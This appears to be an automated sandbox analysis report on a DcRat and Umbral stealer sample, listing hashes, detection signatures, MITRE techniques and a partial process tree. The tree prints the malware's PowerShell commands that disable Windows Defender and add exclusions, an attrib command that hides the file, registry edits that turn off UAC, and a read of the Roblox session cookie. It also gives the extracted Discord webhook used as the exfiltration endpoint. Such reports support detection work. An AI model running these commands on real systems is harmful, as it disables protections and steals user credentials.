dcrat | 4ce4afc5fd856ed5951e35c3efd45fdc03662abf43050fddc564023ef40e6823

Analysis

max time kernel
150s
max time network
151s
platform
windows7_x64
resource
win7-20240704-en
resource tags

arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
submitted
25-07-2024 00:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

LisectAVT_2403002A_368.exe
Size

3.3MB
MD5

db8da2d409c3dc46afe0dd3454388f9c
SHA1

baa1e8196412a06919e37d888651916aae021b69
SHA256

4ce4afc5fd856ed5951e35c3efd45fdc03662abf43050fddc564023ef40e6823
SHA512

016d678636fafc456e146802da7b5d1b8be3f0b474e335158d65c1df4ae8bb241af43fdd278e99f6d50c6610f0fc775c48621b5d45c5841b904a7e1a971edfc0
SSDEEP

98304:oZ1HRsp8NbXaaIptoNMrF4NOgmwCof84h:oZVIaIpeOrmNOTwCol

Score

10^/10

dcrat umbral credential_access discovery evasion execution infostealer rat spyware stealer trojan

Malware Config

Extracted

Family

umbral

https://discord.com/api/webhooks/1219193245557325834/Pny7ckgnLuo9kv28SEntCevPyhBWlY4AfJu4MogOozH9-s-mNnQ7UZJcF1RdHsmmAwgC

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral1/files/0x0007000000004e74-13.dat	family_umbral
behavioral1/memory/2636-15-0x0000000000390000-0x00000000003D0000-memory.dmp	family_umbral

Process spawned unexpected child process 57 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2348	1928	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2616	1928	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2732	1928	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2976	1928	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2468	1928	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2960	1928	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2780	1928	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2708	1928	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2588	1928	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1504	1928	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2364	1928	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1544	1928	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1244	1928	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	536	1928	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1996	1928	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2520	1928	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	344	1928	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1312	1928	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2864	1928	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1608	1928	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2324	1928	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2524	1928	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1568	1928	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2380	1928	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1784	1928	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	960	1928	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2516	1928	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	808	1928	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2500	1928	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1632	1928	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	236	1928	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2432	1928	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2292	1928	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1860	1928	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1864	1928	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2132	1928	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1512	1928	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	880	1928	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2448	1928	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2720	1928	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2820	1928	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	636	1928	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2772	1928	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2576	1928	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2684	1928	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2204	1928	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2472	1928	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2800	1928	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2788	1928	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2752	1928	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2608	1928	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2616	1928	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	592	1928	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1064	1928	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1964	1928	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1876	1928	schtasks.exe	31
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1008	1928	schtasks.exe	31

UAC bypass 3 TTPs 12 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	hyperInto.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	hyperInto.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	hyperInto.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	conhost.exe

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

DCRat payload 6 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral1/files/0x000b0000000120fa-27.dat	dcrat
behavioral1/files/0x000700000001705e-81.dat	dcrat
behavioral1/memory/2260-85-0x0000000000E30000-0x000000000119A000-memory.dmp	dcrat
behavioral1/memory/2100-177-0x0000000000160000-0x00000000004CA000-memory.dmp	dcrat
behavioral1/memory/2344-189-0x0000000000A80000-0x0000000000DEA000-memory.dmp	dcrat
behavioral1/memory/292-202-0x0000000000D40000-0x00000000010AA000-memory.dmp	dcrat

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2740	powershell.exe
2960	powershell.exe
1612	powershell.exe
2388	powershell.exe
1720	powershell.exe
2764	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Saransk.exe

Executes dropped EXE 6 IoCs

pid	Process
2636	Saransk.exe
352	Injector.exe
2260	hyperInto.exe
2100	conhost.exe
2344	conhost.exe
292	conhost.exe

Loads dropped DLL 2 IoCs

pid	Process
1472	cmd.exe
1472	cmd.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Checks whether UAC is enabled 1 TTPs 8 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	conhost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	conhost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	conhost.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	hyperInto.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	hyperInto.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
8	discord.com
9	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
2	ip-api.com

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File created	C:\Program Files\Java\Idle.exe	hyperInto.exe
File created	C:\Program Files\Java\6ccacd8608530f	hyperInto.exe
File created	C:\Program Files\Windows NT\TableTextService\it-IT\WmiPrvSE.exe	hyperInto.exe
File created	C:\Program Files\Windows NT\TableTextService\it-IT\24dbde2999530e	hyperInto.exe

Drops file in Windows directory 11 IoCs

description	ioc	Process
File created	C:\Windows\ModemLogs\winlogon.exe	hyperInto.exe
File opened for modification	C:\Windows\ModemLogs\winlogon.exe	hyperInto.exe
File created	C:\Windows\ModemLogs\cc11b995f2a76d	hyperInto.exe
File created	C:\Windows\es-ES\Saransk.exe	hyperInto.exe
File created	C:\Windows\TAPI\wininit.exe	hyperInto.exe
File created	C:\Windows\Logs\HomeGroup\OSPPSVC.exe	hyperInto.exe
File created	C:\Windows\Logs\HomeGroup\1610b97d3ab4a7	hyperInto.exe
File created	C:\Windows\es-ES\b6edaebc36f21c	hyperInto.exe
File created	C:\Windows\it-IT\spoolsv.exe	hyperInto.exe
File created	C:\Windows\it-IT\f3b6ecef712a24	hyperInto.exe
File created	C:\Windows\TAPI\56085415360792	hyperInto.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Injector.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1692	cmd.exe
348	PING.EXE

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1208	wmic.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
348	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 57 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1312	schtasks.exe
2524	schtasks.exe
2292	schtasks.exe
2864	schtasks.exe
2500	schtasks.exe
1964	schtasks.exe
1244	schtasks.exe
2800	schtasks.exe
592	schtasks.exe
1784	schtasks.exe
2608	schtasks.exe
1876	schtasks.exe
2468	schtasks.exe
236	schtasks.exe
1568	schtasks.exe
1512	schtasks.exe
2204	schtasks.exe
2788	schtasks.exe
2720	schtasks.exe
2772	schtasks.exe
2348	schtasks.exe
2960	schtasks.exe
2780	schtasks.exe
2520	schtasks.exe
2324	schtasks.exe
880	schtasks.exe
1008	schtasks.exe
2576	schtasks.exe
2752	schtasks.exe
2732	schtasks.exe
2364	schtasks.exe
808	schtasks.exe
1632	schtasks.exe
2432	schtasks.exe
2448	schtasks.exe
2616	schtasks.exe
1504	schtasks.exe
960	schtasks.exe
2616	schtasks.exe
1860	schtasks.exe
2132	schtasks.exe
2588	schtasks.exe
344	schtasks.exe
1608	schtasks.exe
2516	schtasks.exe
2820	schtasks.exe
2708	schtasks.exe
1544	schtasks.exe
2684	schtasks.exe
2380	schtasks.exe
2976	schtasks.exe
536	schtasks.exe
1996	schtasks.exe
1864	schtasks.exe
2472	schtasks.exe
1064	schtasks.exe
636	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2740	powershell.exe
2960	powershell.exe
2636	Saransk.exe
1612	powershell.exe
2388	powershell.exe
1720	powershell.exe
1980	powershell.exe
2260	hyperInto.exe
2260	hyperInto.exe
2764	powershell.exe
2260	hyperInto.exe
2260	hyperInto.exe
2260	hyperInto.exe
2260	hyperInto.exe
2260	hyperInto.exe
2260	hyperInto.exe
2260	hyperInto.exe
2100	conhost.exe
2100	conhost.exe
2100	conhost.exe
2100	conhost.exe
2100	conhost.exe
2100	conhost.exe
2100	conhost.exe
2100	conhost.exe
2100	conhost.exe
2100	conhost.exe
2100	conhost.exe
2100	conhost.exe
2100	conhost.exe
2100	conhost.exe
2100	conhost.exe
2100	conhost.exe
2100	conhost.exe
2100	conhost.exe
2100	conhost.exe
2100	conhost.exe
2100	conhost.exe
2100	conhost.exe
2100	conhost.exe
2100	conhost.exe
2100	conhost.exe
2100	conhost.exe
2100	conhost.exe
2100	conhost.exe
2100	conhost.exe
2100	conhost.exe
2100	conhost.exe
2100	conhost.exe
2100	conhost.exe
2100	conhost.exe
2100	conhost.exe
2100	conhost.exe
2100	conhost.exe
2100	conhost.exe
2100	conhost.exe
2100	conhost.exe
2100	conhost.exe
2100	conhost.exe
2100	conhost.exe
2100	conhost.exe
2100	conhost.exe
2100	conhost.exe
2100	conhost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2704	LisectAVT_2403002A_368.exe
Token: SeDebugPrivilege	2740	powershell.exe
Token: SeDebugPrivilege	2636	Saransk.exe
Token: SeDebugPrivilege	2960	powershell.exe
Token: SeIncreaseQuotaPrivilege	2184	wmic.exe
Token: SeSecurityPrivilege	2184	wmic.exe
Token: SeTakeOwnershipPrivilege	2184	wmic.exe
Token: SeLoadDriverPrivilege	2184	wmic.exe
Token: SeSystemProfilePrivilege	2184	wmic.exe
Token: SeSystemtimePrivilege	2184	wmic.exe
Token: SeProfSingleProcessPrivilege	2184	wmic.exe
Token: SeIncBasePriorityPrivilege	2184	wmic.exe
Token: SeCreatePagefilePrivilege	2184	wmic.exe
Token: SeBackupPrivilege	2184	wmic.exe
Token: SeRestorePrivilege	2184	wmic.exe
Token: SeShutdownPrivilege	2184	wmic.exe
Token: SeDebugPrivilege	2184	wmic.exe
Token: SeSystemEnvironmentPrivilege	2184	wmic.exe
Token: SeRemoteShutdownPrivilege	2184	wmic.exe
Token: SeUndockPrivilege	2184	wmic.exe
Token: SeManageVolumePrivilege	2184	wmic.exe
Token: 33	2184	wmic.exe
Token: 34	2184	wmic.exe
Token: 35	2184	wmic.exe
Token: SeIncreaseQuotaPrivilege	2184	wmic.exe
Token: SeSecurityPrivilege	2184	wmic.exe
Token: SeTakeOwnershipPrivilege	2184	wmic.exe
Token: SeLoadDriverPrivilege	2184	wmic.exe
Token: SeSystemProfilePrivilege	2184	wmic.exe
Token: SeSystemtimePrivilege	2184	wmic.exe
Token: SeProfSingleProcessPrivilege	2184	wmic.exe
Token: SeIncBasePriorityPrivilege	2184	wmic.exe
Token: SeCreatePagefilePrivilege	2184	wmic.exe
Token: SeBackupPrivilege	2184	wmic.exe
Token: SeRestorePrivilege	2184	wmic.exe
Token: SeShutdownPrivilege	2184	wmic.exe
Token: SeDebugPrivilege	2184	wmic.exe
Token: SeSystemEnvironmentPrivilege	2184	wmic.exe
Token: SeRemoteShutdownPrivilege	2184	wmic.exe
Token: SeUndockPrivilege	2184	wmic.exe
Token: SeManageVolumePrivilege	2184	wmic.exe
Token: 33	2184	wmic.exe
Token: 34	2184	wmic.exe
Token: 35	2184	wmic.exe
Token: SeDebugPrivilege	1612	powershell.exe
Token: SeDebugPrivilege	2388	powershell.exe
Token: SeDebugPrivilege	1720	powershell.exe
Token: SeDebugPrivilege	1980	powershell.exe
Token: SeDebugPrivilege	2260	hyperInto.exe
Token: SeIncreaseQuotaPrivilege	700	wmic.exe
Token: SeSecurityPrivilege	700	wmic.exe
Token: SeTakeOwnershipPrivilege	700	wmic.exe
Token: SeLoadDriverPrivilege	700	wmic.exe
Token: SeSystemProfilePrivilege	700	wmic.exe
Token: SeSystemtimePrivilege	700	wmic.exe
Token: SeProfSingleProcessPrivilege	700	wmic.exe
Token: SeIncBasePriorityPrivilege	700	wmic.exe
Token: SeCreatePagefilePrivilege	700	wmic.exe
Token: SeBackupPrivilege	700	wmic.exe
Token: SeRestorePrivilege	700	wmic.exe
Token: SeShutdownPrivilege	700	wmic.exe
Token: SeDebugPrivilege	700	wmic.exe
Token: SeSystemEnvironmentPrivilege	700	wmic.exe
Token: SeRemoteShutdownPrivilege	700	wmic.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2704 wrote to memory of 2740	2704	LisectAVT_2403002A_368.exe	32
PID 2704 wrote to memory of 2740	2704	LisectAVT_2403002A_368.exe	32
PID 2704 wrote to memory of 2740	2704	LisectAVT_2403002A_368.exe	32
PID 2704 wrote to memory of 2636	2704	LisectAVT_2403002A_368.exe	34
PID 2704 wrote to memory of 2636	2704	LisectAVT_2403002A_368.exe	34
PID 2704 wrote to memory of 2636	2704	LisectAVT_2403002A_368.exe	34
PID 2704 wrote to memory of 2960	2704	LisectAVT_2403002A_368.exe	35
PID 2704 wrote to memory of 2960	2704	LisectAVT_2403002A_368.exe	35
PID 2704 wrote to memory of 2960	2704	LisectAVT_2403002A_368.exe	35
PID 2636 wrote to memory of 2184	2636	Saransk.exe	37
PID 2636 wrote to memory of 2184	2636	Saransk.exe	37
PID 2636 wrote to memory of 2184	2636	Saransk.exe	37
PID 2704 wrote to memory of 352	2704	LisectAVT_2403002A_368.exe	39
PID 2704 wrote to memory of 352	2704	LisectAVT_2403002A_368.exe	39
PID 2704 wrote to memory of 352	2704	LisectAVT_2403002A_368.exe	39
PID 2704 wrote to memory of 352	2704	LisectAVT_2403002A_368.exe	39
PID 352 wrote to memory of 1960	352	Injector.exe	40
PID 352 wrote to memory of 1960	352	Injector.exe	40
PID 352 wrote to memory of 1960	352	Injector.exe	40
PID 352 wrote to memory of 1960	352	Injector.exe	40
PID 352 wrote to memory of 2376	352	Injector.exe	41
PID 352 wrote to memory of 2376	352	Injector.exe	41
PID 352 wrote to memory of 2376	352	Injector.exe	41
PID 352 wrote to memory of 2376	352	Injector.exe	41
PID 2636 wrote to memory of 292	2636	Saransk.exe	42
PID 2636 wrote to memory of 292	2636	Saransk.exe	42
PID 2636 wrote to memory of 292	2636	Saransk.exe	42
PID 2636 wrote to memory of 1612	2636	Saransk.exe	44
PID 2636 wrote to memory of 1612	2636	Saransk.exe	44
PID 2636 wrote to memory of 1612	2636	Saransk.exe	44
PID 2636 wrote to memory of 2388	2636	Saransk.exe	46
PID 2636 wrote to memory of 2388	2636	Saransk.exe	46
PID 2636 wrote to memory of 2388	2636	Saransk.exe	46
PID 2636 wrote to memory of 1720	2636	Saransk.exe	48
PID 2636 wrote to memory of 1720	2636	Saransk.exe	48
PID 2636 wrote to memory of 1720	2636	Saransk.exe	48
PID 2636 wrote to memory of 1980	2636	Saransk.exe	50
PID 2636 wrote to memory of 1980	2636	Saransk.exe	50
PID 2636 wrote to memory of 1980	2636	Saransk.exe	50
PID 1960 wrote to memory of 1472	1960	WScript.exe	52
PID 1960 wrote to memory of 1472	1960	WScript.exe	52
PID 1960 wrote to memory of 1472	1960	WScript.exe	52
PID 1960 wrote to memory of 1472	1960	WScript.exe	52
PID 1472 wrote to memory of 2260	1472	cmd.exe	54
PID 1472 wrote to memory of 2260	1472	cmd.exe	54
PID 1472 wrote to memory of 2260	1472	cmd.exe	54
PID 1472 wrote to memory of 2260	1472	cmd.exe	54
PID 2636 wrote to memory of 700	2636	Saransk.exe	55
PID 2636 wrote to memory of 700	2636	Saransk.exe	55
PID 2636 wrote to memory of 700	2636	Saransk.exe	55
PID 2636 wrote to memory of 1224	2636	Saransk.exe	57
PID 2636 wrote to memory of 1224	2636	Saransk.exe	57
PID 2636 wrote to memory of 1224	2636	Saransk.exe	57
PID 2636 wrote to memory of 1432	2636	Saransk.exe	59
PID 2636 wrote to memory of 1432	2636	Saransk.exe	59
PID 2636 wrote to memory of 1432	2636	Saransk.exe	59
PID 2636 wrote to memory of 2764	2636	Saransk.exe	61
PID 2636 wrote to memory of 2764	2636	Saransk.exe	61
PID 2636 wrote to memory of 2764	2636	Saransk.exe	61
PID 2636 wrote to memory of 1208	2636	Saransk.exe	72
PID 2636 wrote to memory of 1208	2636	Saransk.exe	72
PID 2636 wrote to memory of 1208	2636	Saransk.exe	72
PID 2636 wrote to memory of 1692	2636	Saransk.exe	95
PID 2636 wrote to memory of 1692	2636	Saransk.exe	95

System policy modification 1 TTPs 12 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	hyperInto.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	hyperInto.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	hyperInto.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
292	attrib.exe

C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002A_368.exe
"C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002A_368.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2704
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Saransk.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2740
- C:\Users\Admin\AppData\Local\Temp\Saransk.exe
  "C:\Users\Admin\AppData\Local\Temp\Saransk.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2636
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2184
- - C:\Windows\system32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Saransk.exe"
    3⤵
    - Views/modifies file attributes
    PID:292
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Saransk.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1612
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2388
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
